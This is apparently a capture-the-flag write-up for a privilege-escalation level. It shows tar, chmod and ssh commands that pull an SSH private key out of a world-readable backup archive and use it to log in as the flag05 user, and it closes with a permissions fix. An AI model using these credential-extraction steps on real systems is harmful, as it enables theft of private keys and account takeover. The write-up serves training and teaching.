- Default permit! A backup that is world-readable.
A look into the directory of
/home/flag05 reveals that there is a backup-directory which is world-readable.
A look into that directory reveals a backup file which is world-readable.
ls -lah /home/flag05/.backup
We can view the contents of the file with:
tar -vztf /home/flag05/.backup/backup-19072011.tgz
This reveals, that there is a private key inside that archive. Our aim: Extract the key and login as
flag05 with the key. Do that by:
tar -Oxzf /home/flag05/.backup/backup-19072011.tgz .ssh/id_rsa > /home/level05/id_rsa
chmod 0600 /home/level05/id_rsa
ssh -i id_rsa flag05@localhost
Logged in as user
flag05 we can execute
Lesson / How to fix
- Use restrict permissions! Protect your backups as good as your data!
chmod 0700 /home/flag05/.backup
chmod 0600 /home/flag05/.backup/backup-19072011.tgz